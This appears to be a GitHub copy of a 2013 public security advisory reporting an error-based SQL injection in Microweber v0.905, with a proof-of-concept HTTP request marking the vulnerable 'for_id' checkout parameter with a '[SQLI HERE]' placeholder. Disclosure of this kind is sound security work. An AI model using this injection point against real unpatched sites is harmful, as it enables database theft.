advisories/nullsec-microwebersqli.txt at master · nullsecuritynet/advisories · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
===============================================================================
|                                                                             |
                         ____                     _ __
              ___  __ __/ / /__ ___ ______ ______(_) /___ __
             / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
            /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
                                                     /___/ team

                          PUBLIC SECURITY ADVISORY
|                                                                             |
===============================================================================


TITLE
=====

Microweber Error Based SQL Injection


AUTHOR
======

Zy0d0x


DATE
====

06/11/2013


VENDOR
======

http://microweber.com/


AFFECTED PRODUCT
================

Microweber v0.905


DESCRIPTION
===========

Input passed via the "for_id" parameter is not properly sanitised before being
processed. This can be exploited to extract sensitive information from the
database(s).


PROOF OF CONCEPT
================

POST /microweber/api/checkout HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/microweber/checkout
Content-Length: 352
Cookie: last_page=checkout; mw-time3830699257=2013-11-06+10%3A11%3A31; helpinfo=false; PHPSESSID=rtip13vkbp1jrsij39ab4isui4
Pragma: no-cache
Cache-Control: no-cache

=1&country=&first_name=test&last_name=test&email=test&phone=test&shipping_gw=shop%2Fshipping%2Fgateways%2Fcountry&for_id=shipping-info-checkout557478767[SQLI HERE]&for=module&City=test&State=test&Zip=test&Street=test&payment_gw=shop%2Fpayments%2Fgateways%2Fpaypal


IMPACT
======

Injection can result in data loss or corruption, lack of accountability, or
denial of access.  Injection can sometimes lead to complete host takeover.


THREAT LEVEL
============

Critical


STATUS
======

Fixed update to version 0.906


DISCLAIMER
==========

nullsecurity.net hereby emphasize, that the information which is published here
are for education purposes only. nullsecurity.net does not take any
responsibility for any abuse or misusage!

                Copyright (c) 2013 - nullsecurity.net